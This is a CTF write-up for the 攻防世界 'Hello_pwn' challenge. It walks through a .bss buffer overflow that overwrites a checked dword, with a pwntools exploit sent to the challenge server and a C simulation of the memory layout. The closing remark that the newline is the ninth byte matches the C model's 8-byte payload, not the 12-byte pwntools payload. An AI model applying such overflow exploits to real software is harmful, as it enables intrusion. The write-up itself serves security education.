攻防世界 Hello_pwn PWN
Check the protections first with checksec: only NX is enabled (no canary, no PIE, so the addresses below are fixed).
[*] '\hellopwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Load it into IDA and decompile main():

    __int64 __fastcall main(int a1, char **a2, char **a3)
    {
      alarm(0x3Cu);
      setbuf(stdout, 0LL);
      puts("~~ welcome to ctf ~~ ");
      puts("lets get helloworld for bof");
      read(0, &unk_601068, 0x10uLL);
      if ( dword_60106C == 1853186401 )
        sub_400686();
      return 0LL;
    }
So read() writes up to 0x10 bytes starting at 0x601068, and then the dword at 0x60106C is compared against 1853186401. That dword sits only 4 bytes after the start of the buffer, so a 16-byte read overflows the 4-byte buffer and lets us overwrite it.
Exploit the overflow in read(): send 4 filler bytes followed by 1853186401 (0x6E756161, which is the bytes "aaun" when stored little-endian) so that sub_400686() is called.
    from pwn import *

    p = remote("61.147.171.105", 64116)
    # 4 bytes fill unk_601068; the next 4 land on dword_60106C.
    # p64 appends 4 more zero bytes past it, still within the 0x10 read.
    payload = b'O' * 4 + p64(1853186401)
    p.sendlineafter(b'lets get helloworld for bof', payload)
    p.interactive()
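To check the offset reasoning offline, here is a small C model of the binary's .bss layout, added here as an example rather than taken from the challenge or the writeup. It assumes (from the decompiled addresses) that the 4-byte buffer at 0x601068 is immediately followed by the compared dword at 0x60106C, and that the host is little-endian like the amd64 target; the names simulate_input, build_payload and magic_as_ascii are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout of the binary's .bss around the read() target (assumed from the
 * decompiled addresses): a 4-byte buffer at 0x601068 immediately followed by
 * the compared dword at 0x60106C. A struct is used so the adjacency holds in
 * this model too; separate C globals are not guaranteed to be contiguous. */
struct bss_model {
    uint8_t  buf[4];    /* unk_601068   */
    uint32_t check;     /* dword_60106C */
    uint8_t  spill[8];  /* whatever follows in .bss; absorbs the rest of the 0x10 bytes */
};

#define MAGIC    1853186401u  /* 0x6E756161, the constant main() compares against */
#define READ_LEN 0x10         /* read(0, &unk_601068, 0x10) */

/* Simulate read(0, &unk_601068, 0x10) delivering `n` bytes of attacker input
 * and return 1 if the comparison guarding sub_400686() would succeed.
 * Assumes a little-endian host, matching the amd64 target. */
int simulate_input(const uint8_t *input, size_t n)
{
    struct bss_model g;
    memset(&g, 0, sizeof g);             /* .bss starts zeroed */
    if (n > READ_LEN)
        n = READ_LEN;                    /* read() copies at most 0x10 bytes */
    memcpy(&g, input, n);                /* the overflow: bytes 4..7 overwrite g.check */
    return g.check == MAGIC;
}

/* Build the 8-byte payload the exploit sends: 4 filler bytes, then MAGIC
 * little-endian (the same first 8 bytes pwntools' p32()/p64() would produce). */
size_t build_payload(uint8_t out[8])
{
    memset(out, 'O', 4);
    for (int i = 0; i < 4; i++)
        out[4 + i] = (uint8_t)(MAGIC >> (8 * i));
    return 8;
}

/* Show the magic as the ASCII its bytes spell once stored little-endian. */
void magic_as_ascii(char out[5])
{
    for (int i = 0; i < 4; i++)
        out[i] = (char)(MAGIC >> (8 * i));
    out[4] = '\0';
}

int main(void)
{
    uint8_t payload[8];
    char ascii[5];
    size_t n = build_payload(payload);
    magic_as_ascii(ascii);
    printf("magic 0x%08x as little-endian ASCII: \"%s\"\n", MAGIC, ascii);
    printf("8-byte payload hits the check: %s\n", simulate_input(payload, n) ? "yes" : "no");
    printf("first 4 bytes only: %s\n", simulate_input(payload, 4) ? "yes" : "no");
    return 0;
}
```

The model also shows why the trailing newline from sendline() is harmless: it is the ninth byte and lands past the dword, inside the 0x10-byte read but after the compared field.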